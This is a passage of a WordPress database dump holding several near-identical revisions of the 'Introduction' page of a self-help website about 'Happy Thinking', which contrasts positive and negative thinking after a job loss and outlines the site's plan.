class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_100623.jpg" alt="" class="wp-image-1785"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-10 22:00:13', '2023-06-10 22:00:13', '', 1034, 'https://www.happythinking.com/?p=1788', 0, 'revision', '', 0),
(1792, 1, '2023-06-11 07:00:15', '2023-06-11 07:00:15', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common negative ways of thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative ways of thinking or help prevent such thinking from affecting you in an adverse way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1791,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_110623.jpg" alt="" class="wp-image-1791"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-11 07:00:15', '2023-06-11 07:00:15', '', 1034, 'https://www.happythinking.com/?p=1792', 0, 'revision', '', 0),
(1790, 1, '2023-06-11 05:38:28', '2023-06-11 05:38:28', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common negative ways of thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative ways of thinking or help prevent such thinking from affecting you in an adverse way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1785,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_100623.jpg" alt="" class="wp-image-1785"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-11 05:38:28', '2023-06-11 05:38:28', '', 1034, 'https://www.happythinking.com/?p=1790', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1842, 1, '2023-06-16 06:20:54', '2023-06-16 06:20:54', '', 'drowning_160623', '', 'inherit', '', 'closed', '', 'drowning_160623', '', '', '2023-06-16 06:20:54', '2023-06-16 06:20:54', '', 1034, 'https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg', 0, 'attachment', 'image/jpeg', 0),
(1841, 1, '2023-06-16 06:07:18', '2023-06-16 06:07:18', '<!-- wp:paragraph -->\n<p>First of all, welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the reality of the world we live in is that we all are constantly surrounded by problems. When facing problems, certain â€œnegative waysâ€ of thinking can unnecessarily increase our suffering, make us less efficient at problem-solving and bring about unhappiness in us. Sometimes such thinking can even create problems when none existed before.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Of course, in the opposite way, one can think in â€œpositiveâ€ ways, which help one better cope with problems and end up making oneself a happier person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common negative ways of thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative ways of thinking or help prevent such thinking from affecting you in an adverse way. I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1826,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron160623a.jpg" alt="" class="wp-image-1826"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-16 06:07:18', '2023-06-16 06:07:18', '', 1034, 'https://www.happythinking.com/?p=1841', 0, 'revision', '', 0),
(1819, 1, '2023-06-14 05:24:09', '2023-06-14 05:24:09', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1803,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/am_i_happy_100623.jpg" alt="" class="wp-image-1803"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common negative ways of thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative ways of thinking or help prevent such thinking from affecting you in an adverse way. I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1791,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_110623.jpg" alt="" class="wp-image-1791"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-14 05:24:09', '2023-06-14 05:24:09', '', 1034, 'https://www.happythinking.com/?p=1819', 0, 'revision', '', 0),
(1804, 1, '2023-06-11 17:25:01', '2023-06-11 17:25:01', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1803,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/am_i_happy_100623.jpg" alt="" class="wp-image-1803"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second 